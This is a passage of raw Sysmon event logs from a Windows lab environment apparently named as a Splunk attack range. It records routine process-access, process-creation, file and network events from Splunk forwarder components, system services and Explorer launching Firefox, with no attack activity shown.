10:51:19.375{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287802Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:19.375{C8EA50B7-F11C-6215-0500-000000003802}412528C:\Windows\system32\csrss.exe{C8EA50B7-11A7-6216-1105-000000003802}4328C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000287801Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:19.375{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-11A7-6216-1105-000000003802}4328C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000287800Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:19.376{C8EA50B7-11A7-6216-1105-000000003802}4328C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000287799Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:19.219{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0270CBFAB213BF938CF385639EE8177D,SHA256=F7735F6E6F6D10576DEF6395057815D2273498D0F586B9A13952119E5D0F99CD,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000216740Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:17.568{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51347-false10.0.1.12-8000- 10341000x8000000000000000287836Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:20.875{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-11A8-6216-1405-000000003802}3464C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287835Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:20.875{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287834Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:20.875{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287833Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:20.875{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287832Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:20.875{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287831Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:20.875{C8EA50B7-F11C-6215-0500-000000003802}4122608C:\Windows\system32\csrss.exe{C8EA50B7-11A8-6216-1405-000000003802}3464C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000287830Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:20.875{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-11A8-6216-1405-000000003802}3464C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000287829Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:20.876{C8EA50B7-11A8-6216-1405-000000003802}3464C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000287828Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:20.594{C8EA50B7-11A8-6216-1305-000000003802}55763972C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287827Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:20.375{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-11A8-6216-1305-000000003802}5576C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287826Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:20.375{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287825Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:20.375{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287824Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:20.375{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287823Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:20.375{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287822Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:20.375{C8EA50B7-F11C-6215-0500-000000003802}4122608C:\Windows\system32\csrss.exe{C8EA50B7-11A8-6216-1305-000000003802}5576C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000287821Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:20.375{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-11A8-6216-1305-000000003802}5576C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000287820Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:20.377{C8EA50B7-11A8-6216-1305-000000003802}5576C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000287819Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:20.235{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7068268DBE0D1B28142012277D1BBE44,SHA256=365EC2D4F09002C56CD6E1178444544B00EDC9ADBE01B41D18243999D06A5C1A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216741Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:20.061{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4061626953B9D342CF5A814D6BCFDF9D,SHA256=898B8527658272B07C2AE4EEFBE13C0BF97297575E733F510580D5872A5DACD6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000287818Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:20.094{C8EA50B7-11A7-6216-1205-000000003802}92856C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x8000000000000000287837Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:21.266{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B3DBEFAA6754A14D0F549413F6E69981,SHA256=CC80A0DD3E38BE732AD53D3D2AF14F9ED700A7CE0A03DB4B4A1118307100333B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216742Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:21.061{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=980FD6F25F80D820BDF08DBDD4D15E3A,SHA256=8FEF14DD3F486048B9A8F024E6FA2A69FFD1DDC6E64A2DCC5482E278D3FBCD56,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000216743Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:51:22.083{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F58D6443024DABE85DE547BC620167D2,SHA256=079103C0BEA5814C31E0CEC0B100BEC016354375FE21265F09D77C94481636A6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000287871Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:22.922{C8EA50B7-F2AD-6215-C000-000000003802}48561964C:\Windows\Explorer.EXE{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+17e8d|C:\Windows\System32\SHELL32.dll+61f80|C:\Windows\System32\SHELL32.dll+63207|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287870Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:22.922{C8EA50B7-F2AD-6215-C000-000000003802}48561964C:\Windows\Explorer.EXE{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla Firefox\firefox.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61a34|C:\Windows\System32\SHELL32.dll+63207|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+15450f|C:\Windows\System32\windows.storage.dll+15328f|C:\Windows\System32\windows.storage.dll+15622f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000287869Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:51:22.922{C8EA50B7-F2AD-6215-C000-000000003802}48565944C:\Windows\Explorer.EXE{C8EA50B7-11AA-6216-1605-000000003802}2228C:\Program Files\Mozilla 